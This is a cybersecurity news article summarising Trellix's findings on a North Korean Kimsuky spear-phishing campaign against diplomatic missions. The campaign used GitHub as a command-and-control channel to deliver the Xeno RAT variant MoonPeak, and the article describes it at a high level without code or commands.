North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

North Korean threat actors have been attributed to a coordinated cyber espionage campaign targeting diplomatic missions in their southern counterpart between March and July 2025.

The activity manifested in the form of at least 19 spear-phishing emails that impersonated trusted diplomatic contacts with the goal of luring embassy staff and foreign ministry personnel with convincing meeting invites, official letters, and event invitations.

“The attackers leveraged GitHub, typically known as a legitimate developer platform, as a covert command-and-control channel,” Trellix researchers Pham Duy Phuc and Alex Lanstein said.

The infection chains have been observed to rely on trusted cloud storage solutions like Dropbox and Daum Cloud, an online service from South Korean internet conglomerate Kakao Corporation, in order to deliver a variant of an open-source remote access trojan called Xeno RAT that grants the threat actors to take control of compromised systems.

The campaign is assessed to be the work of a North Korean hacking group called Kimsuky, which was recently linked to phishing attacks that employ GitHub as a stager for an Xeno RAT known as MoonPeak. Despite the infrastructure and tactical overlaps, there are indications that the phishing attacks match China-based operatives.

The email messages, per Trellix, are carefully crafted to appear legitimate, often spoofing real diplomats or officials so as to entice recipients into opening password-protected malicious ZIP files hosted on Dropbox, Google Drive, or Daum. The messages are written in Korean, English, Persian, Arabic, French, and Russian.

“The spear-phishing content was carefully crafted to mimic legitimate diplomatic correspondence,” Trellix said. “Many emails included official signature, diplomatic terminology, and references to real events (e.g., summits, forums, or meetings).”

“The attackers impersonated trusted entities (embassies, ministries, international organizations), a long-running Kimsuky tactic. By strategically timing lures alongside real diplomatic happenings, they enhanced the credibility.”

Present within the ZIP archive is a Windows shortcut (LNK) masquerading as a PDF document, launching which results in the execution of PowerShell code that, in turn, runs an embedded payload, which reaches out to GitHub for fetching next-stage malware and establishes persistence through scheduled tasks. In parallel, a decoy document is displayed to the victims.

The script is also designed to harvest system information and exfiltrate the details to an attacker-controlled private GitHub repository, while simultaneously retrieving additional payloads by parsing the contents of a text file (“onf.txt”) in the repository to extract the Dropbox URL hosting the MoonPeak trojan.